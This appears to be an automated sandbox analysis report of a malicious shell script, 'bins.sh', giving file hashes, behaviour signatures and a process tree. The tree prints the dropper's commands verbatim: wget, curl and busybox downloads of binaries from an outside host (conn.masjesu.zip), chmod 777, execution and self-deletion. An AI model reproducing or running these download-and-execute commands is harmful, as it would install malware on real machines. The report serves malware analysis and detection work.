Analysis

  • max time kernel
    149s
  • max time network
    13s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    04-11-2024 10:42

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    facd8d5b4de07f8d4d3e00bf507864de

  • SHA1

    6b61bfefc5c5b94bbb154d7bfa00d46c67c421a5

  • SHA256

    00f8a20ed14d818a6397e452410bbc7ad21628aa1aad3b52031fab9dfcd648ad

  • SHA512

    9c32e3e7c4e80b00a5a7cf8ab8d5d4539c19359d0bc62d259b149551d6ef3051a352dde1a701dca898959b6f6d5c1434583f2f992a01caf02fece8a36d5bd721

  • SSDEEP

    192:yjojaqBgs6UM43mu0Ay85dgTjF7S7i7DU7wvKhdKHH+5dgTj57S7i7DU7wmhdKHw:yjojaqBgsuAy85dgTjFGuUqC5dgTj5GL

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 7 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:650
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:659
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • System Network Configuration Discovery
          PID:661
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:667
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • System Network Configuration Discovery
          PID:683
        • /bin/chmod
          chmod 777 cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • File and Directory Permissions Modification
          PID:685
        • /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          ./cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • Executes dropped EXE
          • System Network Configuration Discovery
          PID:686
        • /bin/rm
          rm cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • System Network Configuration Discovery
          PID:688
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d
          2⤵
          • System Network Configuration Discovery
          PID:689
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:691

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj

        Filesize

        98KB

        MD5

        5141342d0df8699fa32a6b066a0c592e

        SHA1

        8157673225bd5182f16215e2aa823a25ca2d4fbc

        SHA256

        54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

        SHA512

        d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801